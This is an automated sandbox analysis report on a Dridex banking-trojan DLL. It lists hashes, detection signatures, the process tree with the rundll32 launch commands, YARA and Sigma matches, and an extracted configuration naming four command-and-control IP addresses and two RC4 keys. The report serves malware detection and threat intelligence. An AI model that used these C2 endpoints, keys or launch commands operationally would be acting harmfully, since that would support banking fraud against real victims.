Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report L0mddDYjoL.dll

Overview

General Information

Sample Name:L0mddDYjoL.dll
Analysis ID:545443
MD5:0d9cc367aa4abc5620b6fcf8e9272f53
SHA1:cb6db576bbe636a895d0ad3e3136483d0ec777be
SHA256:1bd2e431f2631a5bfc21a9e244bb28d4230dad825b9d6396afcd32458923fb0a
Tags:32dllDridexexetrojan
Infos:

Most interesting Screenshot:

Detection

Dridex
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Dridex unpacked file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Call by Ordinal
Tries to delay execution (extensive OutputDebugStringW loop)
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
One or more processes crash
Tries to load missing DLLs
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Abnormal high CPU Usage

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6400 cmdline: loaddll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 5696 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4988 cmdline: rundll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • WerFault.exe (PID: 5924 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4988 -s 728 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6340 cmdline: rundll32.exe C:\Users\user\Desktop\L0mddDYjoL.dll,Wgpomsdeeomtunmdrt MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 5652 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6340 -s 848 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["104.36.167.47:443", "188.40.48.93:4664", "162.241.33.132:9217", "217.160.5.104:593"], "RC4 keys": ["MVvOFIilF0NXOL2BGlf3SZonbBup17KA", "6UfDOLUgX3hJ3XaposUIUiva9uclhs6fenw01keZT6Cxe8VImuG9Uw6F4mFEkE0ddDT1py8ABw"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.371795691.000000006E9A1000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
    00000005.00000000.369759856.000000006E9A1000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
      00000006.00000000.363470341.000000006E9A1000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
        00000006.00000002.389367218.000000006E9A1000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
          00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.0.rundll32.exe.6e9a0000.2.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
              6.0.rundll32.exe.6e9a0000.2.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                6.0.rundll32.exe.6e9a0000.5.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                  1.2.loaddll32.exe.6e9a0000.2.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                    5.0.rundll32.exe.6e9a0000.5.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                      Click to see the 1 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5696, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll",#1, ProcessId: 4988

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 1.2.loaddll32.exe.6e9a0000.2.unpackMalware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["104.36.167.47:443", "188.40.48.93:4664", "162.241.33.132:9217", "217.160.5.104:593"], "RC4 keys": ["MVvOFIilF0NXOL2BGlf3SZonbBup17KA", "6UfDOLUgX3hJ3XaposUIUiva9uclhs6fenw01keZT6Cxe8VImuG9Uw6F4mFEkE0ddDT1py8ABw"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: L0mddDYjoL.dllVirustotal: Detection: 63%Perma Link
                      Source: L0mddDYjoL.dllReversingLabs: Detection: 67%
                      Machine Learning detection for sampleShow sources
                      Source: L0mddDYjoL.dllJoe Sandbox ML: detected
                      Source: L0mddDYjoL.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: L0mddDYjoL.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: wininet.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: WINMMBASE.pdb7 source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.369202824.0000000004F94000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.369297298.0000000003324000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.369736704.0000000003324000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.375195406.0000000004BDC000.00000004.00000001.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384741127.0000000005022000.00000004.00000040.sdmp
                      Source: Binary string: WINMMBASE.pdb1 source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp
                      Source: Binary string: ntdsapi.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb] source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384815927.0000000005020000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: loaddll32.exe, 00000001.00000003.399803453.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.370078267.000000000331E000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.369289634.000000000331E000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384828474.0000000005025000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384741127.0000000005022000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000A.00000002.384212838.0000000000AD2000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000002.391466880.00000000006F2000.00000004.00000001.sdmp
                      Source: Binary string: iphlpapi.pdbQ source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384741127.0000000005022000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdbUm source: WerFault.exe, 0000000B.00000003.384815927.0000000005020000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp
                      Source: Binary string: dwmapi.pdbW source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000A.00000003.369302646.000000000332A000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.369531141.000000000332A000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbY source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384815927.0000000005020000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdbC source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: winmm.pdb} source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000A.00000003.370078267.000000000331E000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.369289634.000000000331E000.00000004.00000001.sdmp
                      Source: Binary string: WINMMBASE.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384828474.0000000005025000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384741127.0000000005022000.00000004.00000040.sdmp
                      Source: Binary string: ffty.pdbj source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp
                      Source: Binary string: mpr.pdbi source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384741127.0000000005022000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb[ source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.399803453.000000004B280000.00000004.00000001.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384741127.0000000005022000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384741127.0000000005022000.00000004.00000040.sdmp
                      Source: Binary string: winmm.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: esent.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp
                      Source: Binary string: pdh.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: ntdsapi.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdbE source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: ffty.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp, L0mddDYjoL.dll
                      Source: Binary string: ffty.pdbVl source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384815927.0000000005020000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb+ source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000A.00000003.369302646.000000000332A000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.369531141.000000000332A000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384815927.0000000005020000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384741127.0000000005022000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384815927.0000000005020000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb+ source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: esent.pdb! source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdbO source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000A.00000003.369297298.0000000003324000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.369736704.0000000003324000.00000004.00000001.sdmp
                      Source: Binary string: ntdsapi.pdb- source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp
                      Source: Binary string: lz32.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbg source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp

                      Networking:

                      barindex
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 104.36.167.47:443
                      Source: Malware configuration extractorIPs: 188.40.48.93:4664
                      Source: Malware configuration extractorIPs: 162.241.33.132:9217
                      Source: Malware configuration extractorIPs: 217.160.5.104:593
                      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                      Source: Joe Sandbox ViewASN Name: GIGASNET-ASUS GIGASNET-ASUS
                      Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
                      Source: Joe Sandbox ViewIP Address: 162.241.33.132 162.241.33.132
                      Source: Joe Sandbox ViewIP Address: 104.36.167.47 104.36.167.47
                      Source: Joe Sandbox ViewIP Address: 217.160.5.104 217.160.5.104
                      Source: WerFault.exe, 0000000A.00000002.384805542.00000000033AD000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.384776459.0000000003370000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
                      Source: loaddll32.exe, 00000001.00000002.684128796.0000000000BCB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      barindex
                      Yara detected Dridex unpacked fileShow sources
                      Source: Yara matchFile source: 5.0.rundll32.exe.6e9a0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.rundll32.exe.6e9a0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.rundll32.exe.6e9a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.loaddll32.exe.6e9a0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.6e9a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.6e9a0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000000.371795691.000000006E9A1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.369759856.000000006E9A1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.363470341.000000006E9A1000.00000020.00020000.sdmp, type: MEMORY
